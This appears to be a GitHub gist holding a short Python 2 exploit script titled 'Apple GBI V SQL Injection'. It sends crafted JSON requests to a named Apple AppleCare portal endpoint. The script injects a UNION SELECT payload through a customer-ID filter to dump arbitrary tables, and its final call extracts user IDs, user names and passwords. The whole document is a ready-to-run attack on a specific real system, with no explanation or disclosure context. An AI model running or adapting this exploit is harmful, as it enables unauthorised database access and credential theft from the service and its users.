Apple GBI V SQL Injection
import requests, json | |
def doInject(injectionQuery): | |
url = "https://gbiportal-apps-external.apple.com/gsf/partShipment/businessareas/AppleCare/subjectareas/acservice/services/batch" | |
r = requests.post(url, headers = { | |
"content-type": "application/json", | |
"X-Requested-With": "XMLHttpRequest", | |
"CSRF": "", | |
"Origin": "https://gbiportal-apps-external-msc.apple.com", | |
"Cookie": "" | |
}, json = { | |
"executionType": "parallel", | |
"requests": [{ | |
"queryName": "query_for_table_filter", | |
"filters": { | |
"D_sold_to_cust_Id": [injectionQuery], | |
"D_ship_to_cust_Id": [""], | |
"D_ORDER_SHIP_DATE": [""], | |
"D_Repair_Type_Cd": [""], | |
"D_Order_ID": [""], | |
"D_Dispatch_Id": [""], | |
"orderBy": ["service_notification_number"], | |
"orderType": ["desc"], | |
"limit": ["*/*/ limit 5000"], | |
"offset": ["0"] | |
} | |
}] | |
}) | |
try: | |
for result in json.loads(r.text)["result"][0]["query_for_table_filter"]: | |
data = result["service_notification_number"].rstrip() | |
print " ".join(data.split("$$$")).encode("utf8") | |
except: | |
print 'failed' | |
def getData(columns, table, schema=""): | |
columnStr = "" | |
for column in columns: | |
if columnStr == "": | |
columnStr+="{}".format(column) | |
else: | |
columnStr+="||'$$$'||{}".format(column) | |
if schema: | |
fromStr = "{}.{}".format(schema,table) | |
else: | |
fromStr = table | |
query = "-1' UNION all SELECT {},null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null FROM/**/{} /*".format(columnStr, fromStr) | |
doInject(query) | |
getData(["user_id","user_name","password"],"passwords","v_catalog") | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment